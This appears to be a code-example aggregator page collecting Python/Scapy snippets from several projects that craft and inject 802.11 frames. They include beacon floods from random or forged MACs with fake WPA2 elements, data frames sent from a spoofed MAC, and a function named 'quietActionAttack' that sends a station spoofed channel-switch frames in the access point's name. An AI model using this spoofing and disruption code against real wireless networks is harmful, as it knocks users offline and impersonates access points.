         ('\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00'
          ))
     if enc:
         frame = RadioTap() / dot11 / beacon_enc / essid / rsn
     else:
         frame = RadioTap() / dot11 / beacon / essid
     sendp(frame, iface=self.iface, inter=inter, loop=1)
예제 #25
파일: test.py 프로젝트: cjcase/beaconleak
def size_test_breadth():
    """Probe how large an encrypted element payload can be sent in one frame.

    For i in 0..65534, encrypts i 'A' bytes with the module-level ``box``,
    places the ciphertext in two elements (ID 253 and 254) behind
    ``t_frame`` and sends one frame on ``if0``.  Returns False at the first
    exception (after printing it), True if every size went through.  The
    ``global`` statement is redundant: the names are only read.
    """
    global box, t_frame, if0
    for i in range(65535):
        try:
            m = box.encrypt(('A' * i).encode('ascii'))
            t_elt = Dot11Elt(ID=253, info=m, len=len(m))
            t_elt2 = Dot11Elt(ID=254, info=m, len=len(m))
            sendp(t_frame / t_elt / t_elt2,
                  iface=if0,
                  loop=0,
                  inter=0.100,
                  count=1,
                  verbose=0)
        except Exception as e:
            # "i * 4" in the message: the meaning of the factor is not
            # evident from this block -- presumably an approximate frame size.
            print("[t] Fail at frame: {}, size: {}\n[e] {}".format(
                i, i * 4, str(e)))
            return False
    print("[t] absolute unit!")
    return True
예제 #26
    def send(self, ssid='Input your SSID'):
        """Loop a beacon for *ssid* from a random MAC on self.interface.

        The beacon is built with default capabilities (no privacy bit) yet
        still carries a WPA2-PSK RSN element; ``utils.rand_mac`` comes from
        module scope.  ``sendp(..., loop=1)`` never returns on its own.
        """
        random_mac_addr = utils.rand_mac()

        dot11 = Dot11(
            type=0,
            subtype=8,  # type : management frame, subtype: beacon frame
            addr1='ff:ff:ff:ff:ff:ff',
            addr2=random_mac_addr,
            addr3=random_mac_addr)
        beacon = Dot11Beacon()
        essid = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
        # RSN element: version 1, TKIP group, CCMP+TKIP pairwise, PSK AKM
        rsn = Dot11Elt(ID='RSNinfo',
                       info=('\x01\x00'
                             '\x00\x0f\xac\x02'
                             '\x02\x00'
                             '\x00\x0f\xac\x04'
                             '\x00\x0f\xac\x02'
                             '\x01\x00'
                             '\x00\x0f\xac\x02'
                             '\x00\x00'))
        frame = RadioTap() / dot11 / beacon / essid / rsn
        sendp(frame, iface=self.interface, inter=0.100, loop=1)
예제 #27
 def base_frame(self, subtype, message=''):
     """Build RadioTap/Dot11/<subtype layer>/SSID plus a vendor element for *message*.

     Args:
         subtype: 4 (Probe Request), 5 (Probe Response) or 8 (Beacon).  Any
             other value leaves ``frame_type`` as the empty string, which is
             then stacked as a raw payload.
         message: text placed in a 'vendor' element after UTF-8 encoding.

     Returns the frame, or an empty list when *message* is empty -- callers
     that compose the result with ``/`` (probe_req/probe_resp) fail on that.
     """
     frame_type = ''
     fc = 0
     if subtype == 4:
         frame_type = Dot11ProbeReq()
     elif subtype == 5:
         frame_type = Dot11ProbeResp()
     elif subtype == 8:
         frame_type = Dot11Beacon(cap='ESS')
     dot11 = Dot11(
         type='Management',
         subtype=subtype,
         FCfield=fc,  # no frame-control flags set
         addr1=self.dst,  # Receiver address
         addr2=self.source,  # Transmitter address
         addr3=self.bssid)  # BSSID
     essid = Dot11Elt(ID='SSID', info=self.net_ssid, len=len(self.net_ssid))
     base_frame = RadioTap() / dot11 / frame_type / essid
     if not message:
         return []
     data = str.encode(message)
     payload = Dot11Elt(ID='vendor', info=data, len=len(data))
     frame = base_frame / payload
     return frame
예제 #28
def quietActionAttack(config):
    """Send a station public-action frames with an Extended CSA for a fixed time.

    ``config`` keys read: "iface", "channel", "time", "mac" (addr1),
    "bssid" (addr2/addr3), "interval".  The ``quiet`` element is built but
    not part of the transmitted frame, so despite the name only the channel
    switch is sent.  Action frames to a station are covered by 802.11w
    (PMF) only for protected categories; a WIDS can flag CSA content from a
    BSSID the real AP does not announce.
    """
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])
    timeToRun = (time.time() + config["time"])

    # Management frame, subtype 13 = action
    dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
    # Two raw bytes (category, action) stacked as a plain payload, not a layer
    category = ('\x04' # public action 
                '\x04')    #channel switch announcement
    csa = Dot11Elt(ID='Extended Channel Switch Announcement', info=(
        '\x00'  #Channel switch mode
        '\x0B'  #new channel number (11)
        '\x00')) #channel switch count
    # NOTE(review): built but unused -- `frame` below does not include it.
    quiet = Dot11Elt(ID='Quiet', info=(
        '\x00'      #Quiet count     | beacon intervals until the quiet interval starts (0 = immediately)
        '\x00'      #Quiet period    | beacon intervals between repeats (0 = none)
        '\x00\x40'      #Quiet duration  | length of the quiet interval in time units (TU)
        '\x00\x00'))    #Quiet offset    | start offset after the beacon, in TU
    frame = RadioTap()/dot11/category/csa
    printTime()
    # One frame per `interval` seconds until `timeToRun` has passed.
    while(time.time() < timeToRun):
        sendp(frame, iface=config["iface"], loop=0, verbose=0)
        time.sleep(config["interval"])  
    printTime()
예제 #29
def geracao_pacotes():

    nome_ponto_referencia = input('Insira o nome do Ponto de Referência: ')
    mac_forjado_pr = criacao_mac_ponto_referencia(nome_ponto_referencia)

    tempo_execucao = float(input("Insira o tempo de execucao (minutos): "))
    print('\n_________________________________________')

    intervalo_envio = float(
        input(
            "Insira o intervalo de frequencia de envio de pacotes (em segundos) : "
        ))
    print('\n_________________________________________')

    num_pacotes = (tempo_execucao * 60) / intervalo_envio

    data = "UFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJUFRRJ"

    ## addr1 = MAC de destino (MAC da placa wireless)
    ## addr2 = Endereco MAC de origem do remetente. (MAC forjado)
    ## addr3 = Endereco MAC do ponto de acesso.
    dot11 = Dot11(type=2,
                  subtype=0,
                  addr1='E4:18:6B:4B:94:00',
                  addr2=mac_forjado_pr,
                  addr3='33:33:33:33:33:33')

    essid = Dot11Elt(
        ID='SSID', info='testSSID',
        len=len('testSSID'))  # indica a capacidade do ponto de acesso

    frame = RadioTap() / dot11 / essid / data

    frame.show()

    input("Digite enter para o inicio do envio de pacotes:")

    sendp(
        frame,
        iface='wlp3s0mon',
        inter=intervalo_envio,
        loop=0,
        count=num_pacotes
    )  # iface = Nome da Interface Wireless. inter = intervalo entre o envio dos pacotes (em segundos). count = numero de pacotes

    escreve_arquivo(nome_ponto_referencia, mac_forjado_pr)
예제 #30
 def send_beacon_frame(self, inter=0.010, loop=0):
     """Send a minimal beacon with a vendor-specific element on self.iface.

     Args:
         inter: seconds between frames (default 10 ms).
         loop: passed to ``sendp``; 0 sends once, 1 repeats until interrupted.

     Addresses come from ``self.bc_mac``/``self.tx_mac``/``self.bssid``; the
     RadioTap header from ``self.get_legacy_radiotap(rate=1)``.  The beacon
     has capability 0, timestamp 0 and a 100 TU interval.  The vendor OUI
     0x544a55 spells "TJU" in ASCII; its meaning is not evident here.
     """
     # packet duration is 736us in 1Mbps
     SSID = '000000-0000-0000'
     mpdu_header = Dot11(type=0,
                         subtype=8,
                         addr1=self.bc_mac,
                         addr2=self.tx_mac,
                         addr3=self.bssid)
     beacon = Dot11Beacon(timestamp=0, beacon_interval=100, cap=0)
     essid = Dot11Elt(ID='SSID', info=SSID, len=len(SSID))
     # len=None lets Scapy compute the element length; info is 9 zero bytes
     vendor_data = Dot11EltVendorSpecific(len=None,
                                          oui=0x544a55,
                                          info=(b'\x00' + b'\x00' * 8))
     frame = self.get_legacy_radiotap(
         rate=1) / mpdu_header / beacon / essid / vendor_data
     sendp(frame, iface=self.iface, inter=inter, loop=loop, verbose=False)